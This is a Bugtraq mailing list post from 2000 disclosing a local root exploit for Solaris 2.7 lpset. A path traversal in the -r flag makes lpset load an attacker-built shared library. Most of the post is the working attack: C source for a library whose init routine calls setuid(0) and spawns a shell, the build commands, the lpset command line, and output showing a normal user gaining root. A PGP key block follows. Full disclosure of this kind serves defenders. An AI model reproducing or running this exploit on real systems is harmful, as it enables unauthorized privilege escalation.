Bugtraq mailing list archives
Solaris/SPARC 2.7 lpset exploit (well not likely !)
From: noir () GSU LINUX ORG TR (noir)
Date: Thu, 27 Apr 2000 14:33:05 +0300
Hi, lpset seems to use strcat() to pass the argument for -r flag ( /usr/lib/print/lib/../../../../tmp/foo) and appends .so to the end. in this case /tmp/foo.so is going to be dlopen but there is a special case /usr/lib/print/lib directory has to exist. xploit shell script is attached. $ uname -a SunOS karate 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10 $ id uid=118(noir) gid=120(boha) $ cd /tmp $ cat > foo.c #include <stdlib.h> #include <unistd.h> void _init(void) { setuid(0); system("/bin/sh"); } ^C$ /usr/local/bin/gcc -fPIC -c foo.c -g -DSOLARIS -Wall $ ld -G -o foo.so foo.o -ldl $ lpset -n xfn -r /../../../../tmp/foo foo # id uid=0(root) gid=120(boha) # Respect, noir -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use mQENAzfpmZ4AAAEIALEp8z+/6SXHZ2IYf0PQnsyCm+9hfHxlQwWQs6BI5rBQdX9J GuSqJfGX3w+fS9xl6MWRlvno3Nmnk66QhBgs8LnunmyhtFN03TBfq7mGoBYKb79R 4jX/kjGUg9oUCr+6sqwN3bXp812qKpScxKVMvMCtQissVzDLdA01U1wCFhMg7xBQ N9lP8tJQ1gtKUnzdsnFgsLkgT3uN+Ek7bQdmwz9a1Xqcq2jxVj5j4yEErQoY3J8m viV+u8mr/Wo0vWEGwIeCWOKNi6SXGz69Pd9a+JRjYIBnuu33o64aEYoMGbFdslNM KbWxsXJJAwtw4/JqKt/LosYAFreteGhdA56c7JsABRG0IE5vaXIgU2luIDxub2ly QGdzdS5saW51eC5vcmcudHI+iQEVAwUQN+mZnnhoXQOenOybAQG16Af8Dk4ZRciA M1Fwq/fJOQJ/kcdszFHAEVHh1nToC99b+ZeoX2I3AIzrpYl0aGZBWQeGbtG4FZuz ldWQcvT8jsQ1M1FraAZgKIzukxAxiOJL1twlQJyEDYQ3wwyWIXXqS3c1/jl7PgC1 iv7RQXxxLRn9qFPJQcaJavxRAAVytkDQWocTguRaehtdZsjxLmH2eE7cGQe0N9aL JJfq0XLl1NjeV5pu5oTkc90/aJ/uHxPOStmPULm5WZP6nCTaQ28lPJBaDV8pLdPo dSg+kvlvhi+k7UgAdvsETA/I6paFyOLq8lFdORA/GHof89NQX3OyJmDGTknfKtAf 9Ky2NbzA12r6zQ== =o1d1 -----END PGP PUBLIC KEY BLOCK----- <HR NOSHADE> <UL> <LI>application/x-sh attachment: lpset.sh </UL>
Current thread:
- Solaris/SPARC 2.7 lpset exploit (well not likely !) noir (Apr 27)